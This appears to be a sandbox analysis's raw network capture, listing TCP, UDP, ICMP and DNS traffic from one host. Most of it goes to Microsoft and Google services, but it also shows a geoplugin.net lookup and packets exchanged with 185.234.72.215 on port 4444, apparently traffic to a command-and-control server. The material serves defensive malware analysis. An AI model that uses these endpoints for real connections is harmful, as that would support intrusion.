                                                                                                                                                                                            Jan 4, 2025 18:45:53.447746038 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448590994 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448714972 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448940039 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.448990107 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.514841080 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:53.514847040 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:53.717530012 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:57.491739035 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:57.491836071 CET4435077413.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:57.491899014 CET50774443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:59.909547091 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:59.909554958 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:59.909640074 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:59.909862041 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:45:59.909872055 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:00.570159912 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:00.570425034 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:00.570435047 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:00.571415901 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:00.571465969 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:00.571768999 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:00.571822882 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:00.717197895 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:00.717228889 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:00.906305075 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:02.452847958 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:02.452959061 CET4435078113.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:02.453022957 CET50781443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.044451952 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.044471025 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:06.044528961 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.044687033 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.044698000 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:06.679447889 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:06.679636002 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.679646969 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:06.680697918 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:06.680752039 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.681021929 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.681087971 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:06.863307953 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:06.863321066 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.000607014 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:07.336388111 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:07.336420059 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.336472988 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:07.336658001 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:07.336672068 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.973681927 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.974033117 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:07.974050045 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.974910021 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.974982023 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:07.975323915 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:07.975374937 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:08.107585907 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:08.107597113 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:08.215804100 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:11.412275076 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:11.412368059 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:11.412450075 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:11.743591070 CET50796443192.168.2.413.107.246.60
                                                                                                                                                                                            Jan 4, 2025 18:46:11.743603945 CET4435079613.107.246.60192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:12.462798119 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:12.462857962 CET44350798142.250.185.164192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:12.462914944 CET50798443192.168.2.4142.250.185.164
                                                                                                                                                                                            Jan 4, 2025 18:46:15.509845018 CET444449734185.234.72.215192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:15.620866060 CET497344444192.168.2.4185.234.72.215

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Jan 4, 2025 18:41:58.528238058 CET5061953192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:41:58.537939072 CET53506191.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:03.090076923 CET53653571.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:03.092542887 CET53631051.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:04.087935925 CET53607721.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:06.289007902 CET6158153192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:06.289140940 CET5602653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:07.111042976 CET5846353192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:07.111406088 CET5317353192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:07.117693901 CET53584631.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:07.118217945 CET53531731.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:07.446263075 CET5060853192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:07.446523905 CET5918253192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:10.705421925 CET53509991.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:11.784626961 CET6152453192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:11.784626961 CET6002253192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:42:15.878036022 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                            Jan 4, 2025 18:42:21.335083961 CET53636551.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:42:40.099209070 CET53636431.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:43:02.682549953 CET53639911.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:43:02.738709927 CET53653261.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:43:08.842801094 CET5693753192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:43:08.842966080 CET6242353192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:43:11.789041996 CET5295053192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:43:11.789257050 CET4965053192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:43:33.339607000 CET53564481.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:44:07.218395948 CET5773253192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:44:07.220752001 CET5590953192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:44:07.225565910 CET53577321.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:44:07.227592945 CET53559091.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:44:10.416934967 CET6248653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:44:10.417674065 CET5475953192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:44:18.134434938 CET53626871.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:11.823878050 CET4918653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:45:11.823878050 CET6087453192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:45:13.814213991 CET6200653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:45:13.814326048 CET5048653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:45:33.526132107 CET53566371.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:45:38.270622015 CET53579061.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.328948975 CET5978353192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:46:07.329149008 CET4960653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:46:07.335469961 CET53597831.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:07.335668087 CET53496061.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 4, 2025 18:46:11.822084904 CET6083653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:46:11.840440989 CET6491653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 4, 2025 18:46:16.536588907 CET138138192.168.2.4192.168.2.255

                                                                                                                                                                                            ICMP Packets

                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                            Jan 4, 2025 18:42:03.999545097 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:42:06.323827982 CET192.168.2.41.1.1.1c2c1(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:42:07.852355003 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:42:12.980087042 CET192.168.2.41.1.1.1c264(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:42:17.284177065 CET192.168.2.41.1.1.1c264(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:43:04.589380980 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:43:15.514178991 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:43:20.538971901 CET192.168.2.41.1.1.1c264(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:45:08.188726902 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:46:09.575728893 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Jan 4, 2025 18:46:11.848278999 CET192.168.2.41.1.1.1c275(Port unreachable)Destination Unreachable

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Jan 4, 2025 18:41:58.528238058 CET192.168.2.41.1.1.10xd124Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.289007902 CET192.168.2.41.1.1.10xdaStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.289140940 CET192.168.2.41.1.1.10x3866Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.111042976 CET192.168.2.41.1.1.10xcfcfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.111406088 CET192.168.2.41.1.1.10x2d09Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.446263075 CET192.168.2.41.1.1.10x4e83Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.446523905 CET192.168.2.41.1.1.10xf792Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:11.784626961 CET192.168.2.41.1.1.10x8814Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:11.784626961 CET192.168.2.41.1.1.10x5880Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.842801094 CET192.168.2.41.1.1.10x348eStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.842966080 CET192.168.2.41.1.1.10x163cStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:11.789041996 CET192.168.2.41.1.1.10xa35cStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:11.789257050 CET192.168.2.41.1.1.10xf6dStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:07.218395948 CET192.168.2.41.1.1.10x681Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:07.220752001 CET192.168.2.41.1.1.10x2c6eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.416934967 CET192.168.2.41.1.1.10x8cffStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.417674065 CET192.168.2.41.1.1.10xdd3fStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:11.823878050 CET192.168.2.41.1.1.10xc52fStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:11.823878050 CET192.168.2.41.1.1.10xebf8Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.814213991 CET192.168.2.41.1.1.10x344dStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.814326048 CET192.168.2.41.1.1.10x2b14Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:07.328948975 CET192.168.2.41.1.1.10xdc5fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:07.329149008 CET192.168.2.41.1.1.10x939eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:11.822084904 CET192.168.2.41.1.1.10xca58Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:11.840440989 CET192.168.2.41.1.1.10x60faStandard query (0)mdec.nelreports.net65IN (0x0001)false

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Jan 4, 2025 18:41:58.537939072 CET1.1.1.1192.168.2.40xd124No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.295747042 CET1.1.1.1192.168.2.40x6a87No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.295747042 CET1.1.1.1192.168.2.40x6a87No error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.295747042 CET1.1.1.1192.168.2.40x6a87No error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.295870066 CET1.1.1.1192.168.2.40x4954No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.296917915 CET1.1.1.1192.168.2.40xdaNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.296917915 CET1.1.1.1192.168.2.40xdaNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.296917915 CET1.1.1.1192.168.2.40xdaNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.296917915 CET1.1.1.1192.168.2.40xdaNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.323781013 CET1.1.1.1192.168.2.40x3866No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:06.323781013 CET1.1.1.1192.168.2.40x3866No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.117693901 CET1.1.1.1192.168.2.40xcfcfNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.118217945 CET1.1.1.1192.168.2.40x2d09No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.451646090 CET1.1.1.1192.168.2.40xcc4fNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.451646090 CET1.1.1.1192.168.2.40xcc4fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.451646090 CET1.1.1.1192.168.2.40xcc4fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.451693058 CET1.1.1.1192.168.2.40x2dfaNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.453448057 CET1.1.1.1192.168.2.40x4e83No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.453448057 CET1.1.1.1192.168.2.40x4e83No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.453448057 CET1.1.1.1192.168.2.40x4e83No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.453448057 CET1.1.1.1192.168.2.40x4e83No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.454052925 CET1.1.1.1192.168.2.40xf792No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:07.454052925 CET1.1.1.1192.168.2.40xf792No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:11.793008089 CET1.1.1.1192.168.2.40x5880No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:11.793114901 CET1.1.1.1192.168.2.40x8814No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:12.968261003 CET1.1.1.1192.168.2.40xa8caNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:12.980036974 CET1.1.1.1192.168.2.40xc4b9No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:17.275834084 CET1.1.1.1192.168.2.40xb0aaNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:42:17.283816099 CET1.1.1.1192.168.2.40xa0b6No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.837004900 CET1.1.1.1192.168.2.40xc589No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.837004900 CET1.1.1.1192.168.2.40xc589No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.837004900 CET1.1.1.1192.168.2.40xc589No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.838015079 CET1.1.1.1192.168.2.40xa592No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.850038052 CET1.1.1.1192.168.2.40x348eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.850038052 CET1.1.1.1192.168.2.40x348eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.850038052 CET1.1.1.1192.168.2.40x348eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.850038052 CET1.1.1.1192.168.2.40x348eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.850831032 CET1.1.1.1192.168.2.40x163cNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:08.850831032 CET1.1.1.1192.168.2.40x163cNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:11.797528028 CET1.1.1.1192.168.2.40xf6dNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:11.797539949 CET1.1.1.1192.168.2.40xa35cNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:15.514040947 CET1.1.1.1192.168.2.40x5556No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:15.526670933 CET1.1.1.1192.168.2.40xf920No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:20.529654026 CET1.1.1.1192.168.2.40x7380No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:43:20.538919926 CET1.1.1.1192.168.2.40x497aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:07.225565910 CET1.1.1.1192.168.2.40x681No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:07.227592945 CET1.1.1.1192.168.2.40x2c6eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.419363976 CET1.1.1.1192.168.2.40x12cdNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.419363976 CET1.1.1.1192.168.2.40x12cdNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.419363976 CET1.1.1.1192.168.2.40x12cdNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.419527054 CET1.1.1.1192.168.2.40x8259No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.423736095 CET1.1.1.1192.168.2.40x8cffNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.423736095 CET1.1.1.1192.168.2.40x8cffNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.423736095 CET1.1.1.1192.168.2.40x8cffNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.423736095 CET1.1.1.1192.168.2.40x8cffNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
